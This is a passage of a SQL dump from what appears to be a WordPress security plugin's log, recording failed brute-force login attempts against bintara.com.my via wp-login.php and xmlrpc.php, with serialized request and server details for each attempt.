empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.144.38.66\";s:11:\"REMOTE_PORT\";s:5:\"33366\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNs37Luw7edOKpgf7BxmwAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566797023.7084\";s:12:\"REQUEST_TIME\";s:10:\"1566797023\";}}','notice','2019-08-26 05:23:45','2019-08-26 05:23:44',17685088,19176160,'https://bintara.com.my/wp-login.php',1,0,'162.144.38.66'),(23049,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.144.38.66\";s:11:\"REMOTE_PORT\";s:5:\"33860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNs4klLQKVpx7Mms7u9jwAAAcs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566797026.874\";s:12:\"REQUEST_TIME\";s:10:\"1566797026\";}}','notice','2019-08-26 05:23:48','2019-08-26 05:23:47',18198992,19495512,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.38.66'),(23050,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"210.57.217.18\";s:11:\"REMOTE_PORT\";s:5:\"58140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNvADzAXRCh@i15RK0vNgAAANI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566797568.7411\";s:12:\"REQUEST_TIME\";s:10:\"1566797568\";}}','notice','2019-08-26 05:32:50','2019-08-26 05:32:49',17684048,19175576,'https://bintara.com.my/wp-login.php',1,0,'210.57.217.18'),(23051,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.126.75\";s:11:\"REMOTE_PORT\";s:5:\"47482\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNw-boUwst7QvA2tJFfRwAAAVM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566798077.9577\";s:12:\"REQUEST_TIME\";s:10:\"1566798077\";}}','notice','2019-08-26 05:41:19','2019-08-26 05:41:18',17683144,19173776,'https://bintara.com.my/wp-login.php',1,0,'167.99.126.75'),(23052,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.126.75\";s:11:\"REMOTE_PORT\";s:5:\"49074\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNxBXxaD7qVX4VJuZ-TjQAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566798085.9645\";s:12:\"REQUEST_TIME\";s:10:\"1566798085\";}}','notice','2019-08-26 05:41:27','2019-08-26 05:41:26',18202536,19501840,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.126.75'),(23053,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.27.132.110\";s:11:\"REMOTE_PORT\";s:5:\"49840\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNx27oUwst7QvA2tJFfvgAAAU8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566798299.6494\";s:12:\"REQUEST_TIME\";s:10:\"1566798299\";}}','notice','2019-08-26 05:45:00','2019-08-26 05:44:59',17682936,19172624,'https://bintara.com.my/wp-login.php',1,0,'185.27.132.110'),(23054,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"206.189.138.149\";s:11:\"REMOTE_PORT\";s:5:\"39990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN15bLuw7edOKpgf7B0rwAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566799333.5944\";s:12:\"REQUEST_TIME\";s:10:\"1566799333\";}}','notice','2019-08-26 06:02:14','2019-08-26 06:02:14',17682576,19173192,'https://bintara.com.my/wp-login.php',1,0,'206.189.138.149'),(23055,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"176.31.66.138\";s:11:\"REMOTE_PORT\";s:5:\"56474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN2pXxaD7qVX4VJuZ-YmwAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566799525.8389\";s:12:\"REQUEST_TIME\";s:10:\"1566799525\";}}','notice','2019-08-26 06:05:27','2019-08-26 06:05:26',17683216,19174512,'https://bintara.com.my/wp-login.php',1,0,'176.31.66.138'),(23056,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"176.31.66.138\";s:11:\"REMOTE_PORT\";s:5:\"56674\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN2qLLuw7edOKpgf7B0wQAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566799528.8668\";s:12:\"REQUEST_TIME\";s:10:\"1566799528\";}}','notice','2019-08-26 06:05:30','2019-08-26 06:05:29',18201880,19499608,'https://bintara.com.my/xmlrpc.php',1,0,'176.31.66.138'),(23057,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 